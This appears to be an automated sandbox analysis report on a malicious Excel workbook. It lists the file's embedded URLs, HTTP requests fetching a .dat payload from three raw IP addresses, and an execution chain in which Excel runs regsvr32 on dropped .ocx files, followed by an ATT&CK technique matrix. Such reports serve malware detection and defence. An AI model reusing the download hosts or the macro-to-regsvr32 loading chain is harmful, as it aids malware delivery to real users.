    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://invites.office.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://lifecycle.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://login.microsoftonline.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://login.windows.local
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://management.azure.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://management.azure.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://messaging.office.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://ncus.contentsync.
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://officeapps.live.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://onedrive.live.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://osi.office.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://otelrules.azureedge.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://outlook.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://outlook.office.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://outlook.office365.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://outlook.office365.com/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://powerlift.acompli.net
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://roaming.edog.
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://settings.outlook.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://staging.cortana.ai
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://tasks.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://webshell.suite.office.com
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://wus2.contentsync.
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: global trafficHTTP traffic detected: GET /2437620704597850.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.141.26.236Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2437620704597850.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.252.215.41Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2437620704597850.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.165.62.32Connection: Keep-Alive

    System Summary

    barindex
    Source: Screenshot number: 8Screenshot OCR: Enable Editing ) PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Screenshot number: 8Screenshot OCR: Enable Content (D SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 0Screenshot OCR: Enable Content CD SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful . files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content (D SECURITY WARNING Macros have been disabled. Enable Content Oj If you are using
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet: Vtreytr contains: urlmon
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet: Vtreytr contains: urlmon
    Source: Summary-573686706-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-573686706-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-573686706-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-573686706-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-573686706-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-573686706-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1111
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa3
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa6
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Detr
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Detr
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa2
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Vtreytr
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Vtreytr
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd2
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Xwtrdferyy
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa11111
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa11111
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa3
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa6
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd2
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa2
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Xwtrdferyy
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1
    Source: Summary-573686706-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1111
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: 253E484C.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: Summary-573686706-Feb-15.xlsbReversingLabs: Detection: 16%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser1.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser2.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser3.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E5D77A92-02A3-4CCA-B765-D1C3067316BF} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal80.expl.evad.winXLSB@7/5@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Summary-573686706-Feb-15.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Summary-573686706-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Summary-573686706-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: Summary-573686706-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
    Source: Summary-573686706-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
    Source: Summary-573686706-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings7.bin
    Source: Summary-573686706-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: 253E484C.tmp.1.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Scripting
    1
    DLL Side-Loading
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    File and Directory Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
    Non-Application Layer Protocol
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts22
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory2
    System Information Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Process Injection
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Ingress Tool Transfer
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
    Scripting
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Summary-573686706-Feb-15.xlsb16%ReversingLabsDocument-Excel.Downloader.Heuristic
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://roaming.edog.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    http://185.252.215.41/2437620704597850.dat0%Avira URL Cloudsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://api.aadrm.com0%URL Reputationsafe
    http://188.165.62.32/2437620704597850.dat0%Avira URL Cloudsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    http://185.141.26.236/2437620704597850.dat0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://185.252.215.41/2437620704597850.datfalse
    • Avira URL Cloud: safe
    unknown
    http://188.165.62.32/2437620704597850.datfalse
    • Avira URL Cloud: safe
    unknown
    http://185.141.26.236/2437620704597850.datfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
      high
      https://login.microsoftonline.com/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
        high
        https://shell.suite.office.com:1443BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
            high
            https://autodiscover-s.outlook.com/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
              high
              https://roaming.edog.BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
              • URL Reputation: safe
              unknown
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                high
                https://cdn.entity.BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/queryBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                    high
